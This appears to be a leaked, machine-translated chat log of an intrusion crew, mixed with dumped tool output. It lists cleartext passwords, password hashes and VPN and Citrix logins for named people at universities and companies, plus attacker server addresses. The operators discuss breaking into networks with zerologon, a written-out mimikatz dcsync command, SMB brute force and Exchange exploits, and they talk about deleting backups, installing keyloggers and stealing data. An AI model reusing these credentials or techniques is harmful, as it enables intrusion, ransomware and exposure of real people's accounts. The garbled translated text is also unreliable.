      [+] Found: SessionID: jszrMOtthNXAO10JW5RIO7MW18D5isBJlOb02qBGEBQ= userType: 1 userName: dlindblad Password: Hicksville83 Domain: L&M Domain
      [+] Found: SessionID: lJjQi2ri9viQWQ1XEmCvrAfnmmV3Ev2CS0wwq92riAs= userType: 1 userName: tbishop Password: P0L!1nS3c0Nn0 Domain: L&M Domain
      [+] Found: SessionID: lufvh9TXJezldkQQ2KF5mimA3mnwS9qneyWGr4TFPOU= userType: 1 userName: cjackson Password: h44RsF2PP* Domain: L&M Domain
      [+] Found: SessionID: sDrdLmvwALSF3jTMnSUkHYwq9ZfWqPcbd0PlX0bBJ5o= userType: 1 userName: acox Password: December2020 Domain: L&M Domain
      [+] Found: SessionID: smA9plEUTxuk1LKzY0qOLCsOC7n7SJlG7pVwnj9aj9o= userType: 1 userName: cfarrell Password: Covid2019! Domain: L&M Domain
      [+] Found: SessionID: tel1xLliHnrxuJ4jG9eA1RfLrHgIi5RFNFdmA9qM9rA8= userType: 1 userName: lstrzegowski Password: Whiskers45$ Domain: L&M Domain
      [+] Found: SessionID: tn9IFU4flYiaulqazAeVJA5vWp5thOOj2ZzTvq08C9U= userType: 1 userName: aluckey Password: SelenaBrody&Champ35 Domain: L&M Domain
      [+] Found: SessionID: vhyW0wcf8tOIlogYk7tb4qpKNYGlZGPeAU1EiL1b8XY= userType: 1 userName: nthompson Password: Trinity2011 Domain: L&M Domain
      [+] Found: SessionID: wOfMo3AmB7a0a0a0tk8Js1kpwwINyCCTOHKWHIkhutrag= userType: 1 userName: sriggs Password: Sammers0309# Domain: L&M Domain
      [+] Found: SessionID: x1Fb1A3YjVnXF40T10eItH4OdjRdsxZG7MrCtqDLpxA= userType: 1 userName: tfewster Password: BabyItsColdOutside1 Domain: L&M Domain
[+] Done with https://107.0.14.250, found 33 sessions
33
[+] Saving session data
[+] Trying session 1jHJ05pyjLQw0GZvgyDhnE2jJwv0sFnc9toWZFfQpSM=
[+] Saving config to ./Dumps/107.0.14.250/config.sqlite
[==================================================]
[+] Config dumped
[+] Parsing configuration data

[+] Finding users
[+] Found 143 users


[+] Finding AD credentials
[!!!] Found Active Directory creds
[+] AD creds sslvpn:4311_Secure@10.1.1.45

[+] Looking for LDAP domain credentials
[-] No LDAP credentials found.

[+] Looking for RADIUS domain creds
[-] No usable RADIUS domain data

[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds

[**] Found bookmark with creds
[+] Found bookmark {'name': '1', 'username': 'sslvpn', 'password': '4311_Secure', 'service': 'RDP', 'host': '10.1.1.45'}
if i will not be there by this time and you have a deadlock, you can go home before one o'clock then i think there is a way to do something with relayda, there are about 6 dk and all are patched erogon also past? try all kinds of web services with scanners look forda, already tried 100 times to other pc's?there is a ghost of hope for sbmgost and ethernal? there is a ghost of hope for shulcitra alsoexcch can't be seen noasharfineedr gave nothing? nothing at all? well, there is another thing for 20k pc 0 services? more specifically nothing can be seen citra, vcenter, shul etc. there is almost 0 (refer to services within the network) well in general we have a deadlock now in our network, maybe some other vectors you can suggest?tomorrow by 5 what a delight))) to 2 work with what we have today without sessions) to 10?)))) by how many sessions will be available? only 2 will be available, the other creeds are not valid (so do not turn off I ran across some that were available, they need to connect to turn off the winDFto yesterday have not finished?
dig into snpartners.com. what's the task?
108.62.118.209
https://simvp.com
-
104.194.11.10:50058
ZdAscYQ31DMSJ9EsJ4DcntCSrubZt9gRVyX
yes and yes@user9 don't you have t eotclick in sessions? is this new?)
i'll ask around and see if anyone has tried it elsewhere) i found the addressee's addressee codes and i'm just messing around with them. i read the docks too) there may be a differentiation of rights for some reason
look at the docks for the suite I can't tell you, but it should be in the documentation.... I'm inside Veeam One monitor and I don't know how to delete backups...it seems to be a cloud version of Veeamclearance have you dealt with VeeamOne?
I have!
``You did, but it's probably expired - it won't let me in.``Hi
didn't they give you a Kmd5 account? no, they didn't) ``aac86ad4320f7cca879a87724c7d3647 ``need clears from Kmd5DC
```
Server Name IP Address
 ----------- ----------
 Z1AD3 192.168.1.41
 Z1AD2 10.10.0.2
Ok. reshoot it I would recommend that you reshoot the adinfoTill tomorrow, everyone will show extra sessions on this today that[ ](https://mediaeveryone.com/channel/general?msg=cp3jcby6d8QQMTgur) Group is not, so I'm writing here
Brut finished, of course nothing was brutalized
scanned more on skul, ftp, webs
tomorrow the plan is to let ms17-010, but no credits, so I think the result will be the same as with smbot write to the group at what is over remember to send kerbs @tl2I took kerbsort servers 63sh thought someday will go to the thousandth restart, but no, the system failed and now sometimes loads less:zany_face:I do not know their domain, while I am not online? meaning from the dedicam under wpn `unf.edu `?
there is a LA hash and a bunch of computers where it fits, but it's all Windows 10 Educational
I tried that hash on the servers and it didn't fit.
All my sessions are dead and the domain is in the black.
trying to enter the coboo, which broke yesterday from the tulchain's addfynd, hangs on about 90%, but every restart loads ~20 bytes more :thumbsup:[ ](https://mediaeveryone.com/channel/general?msg=gWidZnXBAk4A935Ga) on my
got the VPN up - scanned the ip scanner from my ip/16
scanned the ports of the PCs I found, there are some with 445
let smb_login with the codes that are and . in the domain, in case there will be so what do you have at the end of the day? from 1:00am to 10:00pm to what time? please let me know how you are doing on the tasks give me an ip in a private message I can reload the dedic?put vnts and connect so)[ ](https://mediaeveryone.com/channel/general?msg=gWidZnXBAk4A935Ga) here is the link to the vpn, but after starting the vpn, the dedicle, apparently, goes beyond the vpn (when connected to the vpn just hangs RDP, after reconnecting RDP - vpn off. After turning on the same goes for a VPN and hangs) will save a lot of time for those who do not have anything except LA Credits on a bunch of machines
https://github.com/Hackndo/lsassy
use this one
take the time to set it up correctly once.
so you have a set VPS on hand for this fuckin' thing right now
https://vpn.floridapoly.edu austinwise0712 MechEng030796!

```
@user9 substituecan't you do anything fun in the settings? Is there any way to tunnel if there's no .cr download option?
I tried the citrix.tmwcloud.com link and creeds, but the connection just hangs in the download.
In citrix itself, all icons are disabled, everything is not available.
https://citrix.tmwcloud.com/gti/auth/login.aspx mritchie Welcome01

```
@user9 replacementwhat can you do with it?)[ ](https://mediaeveryone.com/channel/general?msg=oL6a59ZRrXQpcJ8sv) and here it's not clear, it's some kind of crm
did not find a console or something where you can send commands or a file to cram
Terminal Door Control - toggle switches open/close doors, vending and so on, write the status to the group
https://www.emorycard.emory.edu/onecardwebadmin/operator/logon cwatson yourdoom23

```
@user9 no substitute, empty nothing at all in the citra? @tl1 can i have a substitute?
ipn does not come up and nothing can be taken out of the citra because there is nothing there.already createdhumboldt.edu external domain what? can i have a conf confina `AD.HUMBOLDT.EDU` output to confina then why is the output different? they are localgroup that not /domainlocalgroup /dom?[ ](https://mediaeveryone.com/channel/general?msg=qGXwKiGcGYSmbDoxQ) maximum strange design if you connect not through a browser it will hang[ ](https://mediaeveryone.com/channel/general?msg=Cm4AQuumDNbMoDprq) and it should ask the user to start the upa which I downloaded earlier@tl1 @tl2 What if I use net localgroup "administrators" /dom I get domain users with admin rules on the machine where I start it?[ ](https://mediaeveryone.com/channel/general?msg=cAmidLT3JooCsCNQE) a blank account, nothing in the zip
it's not always clean, but you have to know it or you can uncheck your settings and it will show the path to the history
Get-PSReadLineOption
``````
History File Information. The default location for this file is $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt .
``How do you clean it up?`` Who else don't know if you can store command history on the system?
https://vlab.humboldt.edu/rdweb/webclient/ vl77 M1lksh@ke

```
@user7 replacementa what do you have?
https://apps.ufl.edu/citrix/xenappext/auth/login.aspx icebecky PeGjzXpnvx3Mjp$

```
@user9 replacementwrite status please work in your confurdn will be ready by night, so you will issue it tomorrow. today we are working under current conditionsThis is good newszbs + so that in case of what you can roll it back I will make you a snapshot of the state immediately as you pick up your personal, change the password from the account and send me in a private note the new pass then configure your environment but the basic state soon - during the daymne 16)))there are 3 wine 10 and 3 wine 2016 ok! Glory to the great wars! you will soon be issued individual vindustadny granddisks by tasks in the confab immediately) I am close to a standstill
I had a story yesterday on /16 on 445 from his sabinet, but nothing found) but it's like Everyone has a task?okkakak you remove the hashes at once jump to a couple of servers in addition)naturally)and whether the account is active at all and so check the validity firstOk, kerb I saw - will dtsink doCHalf an hour will come and if there are problems will lookmne need to leave for half an hour now will be, so just say, keep working on yesterday's tasks, you also have 4 dedics now, kobs and everything else the same@user4 you there kerb scrubbed) @tl2 to the conf conf conf skniulHi, not there yetAnybody here? All hello:space_invader:tomorrow by 2 today until 10```.
System Boot Time: 12/28/2020, 12:01:39 PM

``He doesn't turn off the car?
====== AntiVirus ======

  Engine : Spybot - Search and Destroy
  ProductEXE : C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
  ReportingEXE : C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe

  Engine : Security Manager AV Defender Antimalware
  ProductEXE : C:\Program Files\N-able Technologies\AVDefender\WscRemediation.exe
  ReportingEXE : C:\Program Files\N-able Technologies\AVDefender\EPProtectedService.exe

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
``12:03 PMav what?[ ](https://mediaeveryone.com/channel/general?msg=poHHucH2R6fwbP7Ss) seems like it should''
  CurrentUser : WATERWAY\mharper
  Idletime : 01h:11m:03s:765ms (4263765 milliseconds)
``So isn't the session in keystrokes supposed to come up empty?``Isn't the keystrokes typing? On the contrary the hartbit is 0 and the session is still dead, so I don't write keyloggercontext user in svchost[ ](https://mediaeveryone.com/channel/general?msg=mXPPGXmFrDTjn3jAw) but the keylogger doesn't put it on the mharpernew under the mharper user I found such a thing
```
https://store.vmware.com/,https://store.vmware.com/store/,10/7/2019 12:44:17 PM,13214943857640860,mharper@waterway.com,1Vanilla2
```
he also had this in his sharpshooter output
```
http://192.168.0.43/,http://192.168.0.43/,10/21/2019 11:08:36 AM,13216147716516941,,
```
it's nimble, i.e. walks, but no credits(
 
on the same computer found a password-protected file Passwords.xlsx, on the off chance I poked the administrator password, came up, nothing interesting
now trying to open two aacdb-shek@tl1 Checked all available servers/arms everywhere KB stands, now go to the armies check the files, mb that will be. interesting @user3otnick that you have on the results go to the guys (+ at all? no problem, tell the others that you can so time to waste) thank you okay?
bdfb6cd5e3fd0d06ddcb550a10dd935d Mollydog1!
04d5eff0ad5cfa74893376377799e6e4 Edith@2013
371464bd973caf912b2eb57d6e8b8c8d Soccerfun2!
bd626598054a653c5b29362e7ccf0fda @@rdv@r$
1160d864b8efdbf3a2a7789fb7dbf852 S$ophia91
07d4c3a9293355b60d47b8af140658b5 Babe8652
da1b9ecaaafa492621baec7db4e0768c Dexter56!
a6aee6e3cee15dcc6c1da0c0029c9d0e Cheers21
0a1737099297bce33028550c609d51fe Santacruz1
3ef41951b919a7a714f5ccd94d2785b9 Playmakr59
515105422901de09e5147150eae90fc1 Snoopdog6
2aa61789ef2ffea7dde6dd2a669d8b14 Poncho1953
d7a56add2083dbb16f2967ee4a43693c hawaii9
589b85762d8ab451401df29aa7fdc417 Winter2020
f0d246ee027ba7e2222d11f532e33396 RVlife1!
50131ca82ae8323af7bf0a33ce195f6b Ginny12345!
8174a4102f8e0c19ced57f48fbf854ef mima2015
9553947130d99b5305e7c6e2c55f19f6 Bassbass89!
8c07cda602b94dfcf44f1695910a39df Thankgod99*
98bde6ce745eee9db8730f46a1fa4c43 22Marcus22
df3cad6b33ff0a54309cc2c131b7e9fd Cotija207
27909a110b4e50b486d51702bd86857d Quality2!
e7be7281093d53dcfabd8eb3970d0393 R1f12l66$
a9aec143fc91ff315015840d0407c7bd Firstone55
65027469316266a14abe5e628cccfcd0 Molly71@
2b323b1cfec9165938df237613b381a2 Korbel011
f36fee819dad37f174b81b078b296e2e Vineyards15
baf8e023e871f3b5f79512a57c6a62e7 Year2021!
6189b54305abed05d16b60b48cf72ed7 maguey#5
a8588850ef9e29663757ec2382d8fc3b Jackie38
77a37eab2d43a85725f7c90fee594d59 Korbel58
39e1ce27741039350266829c0f7eb4e8 Lucy@2013
f48f52d28ea79b1d658ca5d66c5bff36 M@tt0420
e4a22d8e7bbec871b341c88c2e94cba2 Welcome123!
a1c70a25f68e27c1c0012bb0d58edd66 8barrett!
763ebebf2ba3134afe8f001617a36755 Outofhere!
ec3ccfd708b8aad44bde184a8cef8bcf Kaleb2008
3cd4601799b7516ccf31d5216ed6a5fa Doggies123
2857f0e40a794a646315b20612cabce6 Jaxson2020
ce38fef132030421c1f237301b208ac6 Mexico2021
2af0abe976a17fe926f45fbd26ef9b3b Hermida*14
271f5f4c31c1eccd00458e1884f8111a rich@ter35
c15c6cf00354b412ffb695036bb0da0f Ballplayer3
88da42440abb98e98baaf8d71f6788f0 @dv@n+3l
263dccb097be7270f29ad93249f025b3 Nopass20!
1aef4a9d29b3918e068acf0c40a6d0e4 Frankie8835
b03e5d6101f4428fc15a4af13c2d1f67 Korbel!3
9f492d9fd317748b07d36eead23bd236 Autumn1!
0f9b7619fddf9e02d061d3c580b77820 Lovemy4kids
1ac39bdd695eb913a4f0b73d9159e53d ChangeM3@
ba03a114def8d5c913983436960e592c pass@word1
6be408f1e80386822f4b2052f1f84b4e P@ssw0rd3

´´So I'll let go then?´´ The first three have passed.´´
kirsten.matteri bdfb6cd5e3fd0d06ddcb550a10dd935d
mayria.parmeter 04d5eff0ad5cfa74893376377799e6e4
danielle.matsumura 371464bd973caf912b2eb57d6e8b8c8d

Jcomfort bd626598054a653c5b29362e7ccf0fda
cncsupport 728f33af6ae2a27678028814ab411554
Areoutt 1160d864b8efdbf3a2a7789fb7dbf852
Mhealy 07d4c3a9293355b60d47b8af140658b5
Mroche da1b9ecaaafa492621baec7db4e0768c
PAhvenainen e6242a3a5b39d06307c96f3b77f45f59
Rmarson 8d6d8b8edd61fe852558ed756a8991f3
Lrussell a6aee6e3cee15dcc6c1da0c0029c9d0e
Mindrebo 0a1737099297bce33028550c609d51fe
Bwalsh 3ef41951b919a7a714f5ccd94d2785b9
Gruhland 02b67f42c10f9ce871cd7b24ac0bdff7
Debbie d74378f8a658b50b8acbd4032490fabe
Chakola 515105422901de09e5147150eae90fc1
Serena 891612a4d50457d2c543bc37f0563e90
Dfaris 3fafb54aa5524a39f1298338f6464335
Shollander 2aa61789ef2ffea7dde6dd2a669d8b14
Candrade d7a56add2083dbb16f2967ee4a43693c
Kfaris 752084462e4136656173014ec09bd462
Lreynaga 589b85762d8ab451401df29aa7fdc417
Lcabitac f0d246ee027ba7e2222d11f532e33396
Sschlabach 50131ca82ae8323af7bf0a33ce195f6b
Ahealey 8174a4102f8e0c19ced57f48fbf854ef
Jbidia 4168560575faed5ed2547df2d5935a31
Drhodehamel d5c9925e3cc9d79772c079bccca7b41b
matthealey aaaa2ed2f1ae8dbd18bbd1eff3b90ce6
Aomiotek 9553947130d99b5305e7c6e2c55f19f6
jkrambs 201948eb76f41a6cd4ee48ce49702805
Dan ace98571b9d8b729bc3907c274fe5421
jeannine 8c07cda602b94dfcf44f1695910a39df
Dhaught 98bde6ce745eee9db8730f46a1fa4c43
Gary 8f356149e6b800293dbf993e2cfa0a8f
Jrobertson d96d7fa2b91611712a551cdd11464fb9
Tmazzola 959541859e8db46868cf0c28dc959339
Dsanchez df3cad6b33ff0a54309cc2c131b7e9fd
Ltorres 27909a110b4e50b486d51702bd86857d
Rvalencia e7be7281093d53dcfabd8eb3970d0393
lgiang a9aec143fc91ff315015840d0407c7bd
Jyoungberg 65027469316266a14abe5e628cccfcd0
Hsiniscalco b939fe7947d85a151fde29b100f3d073
Hcscalehouse1 6b3585ea1524578e252eb70e11b40362
hcscalehouse2 6b3585ea1524578e252eb70e11b40362
senturus 70032882faf3427cf9904be36750fee1
senturus2 70032882faf3427cf9904be36750fee1
Econtreras 1973d3c3267dbfe1729e58c3858262fc
llarrabure 2b323b1cfec9165938df237613b381a2
acrolon e0550f6bb9fa17fd37815f201639ff1a
sdostert cb0d3dc3f81b8963a903cba7ebe02eda
Cmilton e8200daf6b049f0195e235a374e8f62c
Khewson f36fee819dad37f174b81b078b296e2e
Cnelson baf8e023e871f3b5f79512a57c6a62e7
Ppicazo 6189b54305abed05d16b60b48cf72ed7
twood a8588850ef9e29663757ec2382d8fc3b
slopez 77a37eab2d43a85725f7c90fee594d59
kdion 39e1ce27741039350266829c0f7eb4e8
Sloopstra 0ba96b15abe438a3f7e79ffe53de3c96
Svaladez 1e7118c5a0c432e782b748686c178fcd
elamb 3238e1417db8896aa9314d33833366c0
mignacio f48f52d28ea79b1d658ca5d66c5bff36
Bjackson 07502ae807bce83b122f8c1bb3422b54
mmensinger 71738c116989d08d9ef06732a8abad93
will.whiteside e4a22d8e7bbec871b341c88c2e94cba2
jennifer.bond a1c70a25f68e27c1c0012bb0d58edd66
denovo 9953126c4fda15c961b170ec582f64fb
chelsea.symmonds 763ebebf2ba3134afe8f001617a36755
luciente.villanueva ec3ccfd708b8aad44bde184a8cef8bcf
jordan.fanucchi 3cd4601799b7516ccf31d5216ed6a5fa
dan.murphy ab433395e941fc7ede1a74b69537435a
edward.silva 2857f0e40a794a646315b20612cabce6
exocet f07ead77a7ffd23bb963ba68815c7c07
kerri.jensen 2144c88c66e286b224c51df66dffcd0f
aaron.debeers ce38fef132030421c1f237301b208ac6
melina.rivera 2af0abe976a17fe926f45fbd26ef9b3b
caitlyn.moore e80b6e82c8c7136b3a856b3ef0f7a529
susan.hazy 812ce3386fcf3069766863c9560cd9d5
barry.levine 271f5f4c31c1eccd00458e1884f8111a
brian.mcclusky c15c6cf00354b412ffb695036bb0da0f
tom.poland 88da42440abb98e98baaf8d71f6788f0
casey.howard 8d09aec6edff573fa9bafa8c301f7d55
cheri.canada 263dccb097be7270f29ad93249f025b3
smokey.chaiyavong 1aef4a9d29b3918e068acf0c40a6d0e4
Courtney.Boosinger b03e5d6101f4428fc15a4af13c2d1f67
davey.santamaria d43e29494f8a512628556209325910af
amanda.smith 9f492d9fd317748b07d36eead23bd236
kristina.karan 0f9b7619fddf9e02d061d3c580b77820
denovoms be2db0a50a166e29553ed4327fbfed87
perry.reyes 1ac39bdd695eb913a4f0b73d9159e53d
chris.pixton ba03a114def8d5c913983436960e592c
shirley.price e862901df2517d9e9b3edac2225eda71
Libby.Fifer 6be408f1e80386822f4b2052f1f84b4e
robert.lacy a22ddddb0061bb5749884050d9475a49
lookingpoint a65c6ee963098bd3c5d5c623315efd4f
alexandra.ogorman 612410304a2ed887f6bc4109ba2f3541
Siobhan.Johnson f156bd3e058922a64b0257a7ee93c6f4
schedule ca2b3bf6af89151f2c40299fe279307c
``I'll send you a list of all the users and hashes there is an option to check the list of hashes)))) how to 1? I check the hashes of dudes from the group "vpn users" and what are you doing? no more give you everything+++ right? we have @user3 with #evo-com
@user8 with #1-done-korbel-com
@user4 @user7 with #waterway-comwhich one of them should have admin rights therefind the mail server - try the acctsDa clarification of some circumstances, just lack of data on the network itselfa what are these changes related to?as you go along, I think you'll figure it out, I think it's `/ecp` what is it exchange admin sektepoka there is an admin account on this EAC which provides mailboxes unloading find a server and look at it as a backups it is additional url on the server and like it `/ecp` what is it exchange admin sektepoka only 1 option of developmentkak what algorithm of actions after finding the servak itself?yes i think how to formulate the question on this point@user7 and @user8 tell me how to do the 3 point) yes, you)[ ](https://mediaeveryone.com/channel/general?msg=wcGT7Kum4gkjpBfCj) and yet) there is a question on these points i will not answer any more@all look here and write that you saw the message) we backups? 3 the point is clear? how do you download them later within the limits of gbling is clear, but backups are heavy. do we download? so there are no questions later [ ](https://mediaeveryone.com/channel/general?msg=dd53m3dEGGvG3cL69) @all all saw?[ ](https://mediaeveryone.com/channel/general?msg=XFXSWgCDeHQPLFrGX) it's about what?+ additional tasks nimbul like nimbul did not come, there's nothing moved? in the confines?[ ](https://mediaeveryone.com/channel/general?msg=YCFp4f789HRuFcdwx) ok, I would have that archive - came you under @user9 logged in? you seem to be in the confineshelp with waterwayappendix is closed / shut down. I reinstalled it, so far it works, what's wrong with it?
f2bad4ac1e1a8562a7275c93d73bddeb 1234qwerASDF!@#$
29742bb43819d7ac0f12e0abec4ae5ce W3lcome?
29742bb43819d7ac0f12e0abec4ae5ce W3lcome?
06d681b7146acf1131ad37740fc9d902 #Ch3ckm30ut#
393f7aa28c905690ffe626d41a814343 agpmadmin
f2bad4ac1e1a8562a7275c93d73bddeb 1234qwerASDF!@#$
bd626598054a653c5b29362e7ccf0fda @@rdv@r$
36c873c206d2d7561f356fdc9c6c7298 switchscan
2839726ca10411244ad1fda1149a335c fkb1882

I'll give you the hashes above, you can check[ ](https://mediaeveryone.com/channel/general?msg=g63wScBdhr2cDqgdz) yes, YES long time ago should have changed, right?[ ](https://mediaeveryone.com/channel/general?msg=GFSYB3Aimw3z2vMas) and stop ... YES these on kmd5 passed
ben.mandeville f2bad4ac1e1a8562a7275c93d73bddeb
daniel.harvey 29742bb43819d7ac0f12e0abec4ae5ce
daniel.harvey_adm 29742bb43819d7ac0f12e0abec4ae5ce
Honcho 06d681b7146acf1131ad37740fc9d902
agpm_admin 393f7aa28c905690ffe626d41a814343
Ben.mandeville_adm f2bad4ac1e1a8562a7275c93d73bddeb
Jcomfort bd626598054a653c5b29362e7ccf0fda
switchscan 36c873c206d2d7561f356fdc9c6c7298
SMSadmin 2839726ca10411244ad1fda1149a335c
``I think there's about domain authorization there.``Are you trying to admin? They changed their passwords a long time agohave a look for vpn / remote / offsite / partner groups
similarwhen our process is complemented by the following actions:
1) remove backups listings up to 7 levels of nesting
2) whine file listings or table structures
3) Backup of mail server
4) fetch 3-4 file backups from the network, and immediately adinfodsink is in the archive above? and try to access these links, you need to pull from the ntds hashes of all users from the group associated with vpn://vpn.korbel.com/global-protect/login.espURL : https://vpn1.korbel.com/+webvpn+/index.htmlhttps://vpn2.korbel.com/global-protect/login.еѕрнужен 1 volunteer to korbel) even lessa in the confab? not much at all (here are such messages from the network, information about external accesses anything interesting there, in principle... and you need something specific? already looking at the question is important check it comptipo what, come to life? user9 should be nothing? backups listings, network architecture files-who left interesting files from #1-done-korbel-com ?so once again, to all the questions when some changes in the work he has something with the rock I @user4 not in the network today@user9 absent, so everything is in place, get it all vpna password what is it? zgLLMB1KXkzV6Dtn4GWQ8S49+accesses someone already have `104.171.123.166:45330`
it's not new, but not too dirty+disassemble and report who got what2 clean``
23.106.160.165
https://rawint.com
----------------------------------------------------------------------------------------
172.93.109.18:51630
S36rQDbsTVH7D62swcBBexyxGkbNBFalsgx
``````
172.241.27.18
https://agesk.com
----------------------------------------------------------------------------------------
209.222.97.8:62460
TnRLaHoRRRwyezbn6ybP1ed1xRlhtnAQAM5o
``in the work we have #waterway-com #evo-com I will give out two new clean the old koba is preparing to close and let's more distribute so then wait for everyone I'm hooked there for closing already, did not catch this momentkat some database files, structures, backups and other things it is not interesting)pinganut on it remained build and hosts[ ](https://mediaeveryone.Hey @user3 here, but you corbel no "interesting" files? + the rest are delayed? so zhesam as? Yes, with a disrupted sleep mode is not very restful Hey, all with the coming) as you relaxed?:space_invader:by the way on the second did not writepodlyayte connect to the guys `` ``
ns1.risq.qc.ca
ns2.risq.qc.ca
dns2.dit.umontreal.ca
dns1.dit.umontreal.ca
```
``umontreal-ca.mail.protection.outlook.com

it's all through nslookup got it, I can not normally shoot hell as I did not try to find the ldap server
of all this only `dns1.dit.umontreal.ca ` pinged a while ago parsed ask colleagues how to do) no, I do not know their hosts, I wanted to pick up the car on which I could get, but I still could not remove the hell did you get into the domain? `AdFind.exe -b dc=umontreal, dc=ca -f "(objectcategory=computer)" > C:\Programdata\ad_computer.txt ` I put it in
Windows IP Configuration

   Host Name . . . . . DESKTOP-VG9EH3G.
   Primary Dns Suffix . . . . :
   Node Type ... ... . ♪ Hybrid ♪
   IP Routing Enabled . . . . No.
   WINS Proxy Enabled. .: No
   DNS Suffix Search List. .

Ethernet adapter Local Area Connection* 10:

   Connection-specific DNS Suffix . : umontreal.ca
   Description . . . . . : Juniper Networks Virtual Adapter
   Physical Address . . . . . 02-05-85-7F-EB-80.
   DHCP Enabled. . . . . .: No
   Autoconfiguration Enabled . .: Yes
   Link-local IPv6 Address. : fe80::b5b3:c3a1:1be4:2c1e%51(Preferred)
   IPv4 Address . . . . .: 10.55.0.113(Preferred)
   Subnet Mask . . . : 255.255.255.255
   Default Gateway . . . . : 0.0.0.0
   DHCPv6 IAID . . . . : 855770501
   DHCPv6 Client DUID . . . . : 00-01-00-01-27-59-8A-42-08-00-27-08-B7-A9
   DNS Servers . . . . . : 10.120.31.31
                                       10.120.184.31
   Primary WINS Server . . . . : 10.113.2.14
   NetBIOS over Tcpip. : Enabled

Ethernet adapter Ethernet 4:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . ♪ Fortinet SSL VPN Virtual Ethernet Adapter ♪
   Physical Address. . . . 00-09-0F-AA-00-01.
   DHCP Enabled . . . . ♪ Yes ♪
   Autoconfiguration Enabled . .: Yes

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix :
   Description . . . . . . : Intel(R) PRO/1000 MT Desktop Adapter
   Physical Address . . . . : 08-00-27-08-B7-A9.
   DHCP Enabled . . . . Yes
   Autoconfiguration Enabled. .: Yes
   Link-local IPv6 Address . : fe80::4413:17f2:dbd6:2eda%14(Preferred)
   IPv4 Address . . . . : 10.0.2.15(Preferred)
   Subnet Mask . . . . : 255.255.255.0
   Lease Obtained.... ♪ Tuesday, January 19, 2021 10:39:52 AM ♪
   Lease Expires . . . . ♪ Thursday, January 21, 2021 1:03:41 PM ♪
   Default Gateway . . . . : 10.0.2.2
   DHCP Server . . . . : 10.0.2.2
   DHCPv6 IAID . . . . : 50855975
   DHCPv6 Client DUID. . . . . : 00-01-00-01-27-59-8A-42-08-00-27-08-B7-A9
   DNS Servers . . . . . : 10.120.31.31
                                       10.120.184.31
   NetBIOS over Tcpip. . . . .: Enabled

Ethernet adapter Ethernet 2:

   Connection-specific DNS Suffix :
   Description . . . . . . : Intel(R) PRO/1000 MT Desktop Adapter #2
   Physical Address . . . . .: 08-00-27-7C-42-6C.
   DHCP Enabled . . . . .: No
   Autoconfiguration Enabled. .: Yes
   Link-local IPv6 Address. : fe80::c969:48be:a7cc:3fdd%19(Preferred)
   IPv4 Address . . . . : 192.168.56.11(Preferred)
   Subnet Mask . . . : 255.255.255.0
   Default Gateway . . . . : 192.168.56.1
   DHCPv6 IAID . . . . . : 134742055
   DHCPv6 Client DUID . . . . : 00-01-00-01-27-59-8A-42-08-00-27-08-B7-A9
   DNS Servers . . . . . : 10.120.31.31
                                       10.120.184.31
   NetBIOS over Tcpip. . . . .: Enabled

Ethernet adapter Ethernet 3:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . . .: Fortinet Virtual Ethernet Adapter (NDIS 6.30) .
   Physical Address . . . . .: 00-09-0F-FE-00-01
   DHCP Enabled . . . . Yes
   Autoconfiguration Enabled . .: Yes
``So wait a minute I do not quite understand about dns)``Are you doing it with a direct dns indication? Is it as I understood with dns something `LDAP Error 81(0x51): Server Down `` does it write when trying to remove the adfind while there are no questions?
https://mydesktop.kingston.ac.uk/portal/webclient/index.html
USER: k1945880@kingston.ac.uk
PASS: Thanzeeh77
``````
https://vpn.umontreal.ca/dana-na/auth/url_default/welcome.cgi
USER: p1204216
PASS: Des99714
``lol, it's fixed.)
no connection to the dk for a while
the sessions stayed
while connected to itc-us.com,kznm
I got nowhere to go
tried zerologon
It seemed to work
but
it won't let me remove dcsync
mimikatz lsadump::dcsync /dc:SS-Data2.Austin.SilencerShop.com /user:SilencerShop\krbtgt /authuser:SS-DATA2$ /authdomain:. /authpassword:"" /authntlm
just doesn't output anything after running the command
pth doesn't work because I don't have rights to run it
Same as yesterday
brute force attack didn't work
I will try to dig into the networking hardware ``msf6 auxiliary(scanner/smb/smb_login) > set pass_file /home/acta/pwd7-12-utf.txt
pass_file => /home/acta/pwd7-12-utf.txt
msf6 auxiliary(scanner/smb/smb_login) > run
[*] Scanned 4 of 22 hosts (18% complete)
[*] Scanned 8 of 22 hosts (36% complete)
[*] Scanned 8 of 22 hosts (36% complete)
[*] Scanned 9 of 22 hosts (40% complete)
[*] Scanned 11 of 22 hosts (50% complete)
msf6 auxiliary(scanner/smb/smb_login) > options
[*] Error: 192.168.1.137: RubySMB::Error::NegotiationFailure Unable to negotiate SMB1 with the remote host: Read timeout expired when reading from the Socket (timeout=30)
[*] Scanned 14 of 22 hosts (63% complete)
[*] Scanned 16 of 22 hosts (72% complete)
[*] Scanned 18 of 22 hosts (81% complete)
[*] Scanned 20 of 22 hosts (90% complete)
[*] Scanned 22 of 22 hosts (100% complete)
[*] Auxiliary module execution completed


``No progress so far. Charging brut smb
https://github.com/Ridter/cve-2020-0688
https://github.com/zcgonvh/CVE-2020-0688
https://github.com/Yt1g3r/CVE-2020-0688_EXP
The ``things''.
Exploit and detect tools for CVE-2020-0688(Microsoft Exchange default MachineKeySection deserialize vulnerability
I think they have it internally and look for their exh1) I don't think a reset will work under that
2) i don't think it will work under another account so if your user is already an admin here, on the nasa disabled interactions through utilities and it goes as fs100-102 you 3 hosts - NetApp with a large number of balls confused you 3 hosts what exactly - nasa? well smb_login says he there admin on the three that are abovea stop some local admin users group on the 3?at least on these machines where? so we have an admin jetak on this case need admin rights to the machine where you will reset) clearing no chance? password depends on something else most likely ablyahmnu I actually have two and alive, I will not check more until he hash on the two cars does not coincide `` ``
Remote Support:1003:aad3b435b51404eeaad3b435b51404ee:5ce89fa1e9148477eb5d6aa455c2d494:::
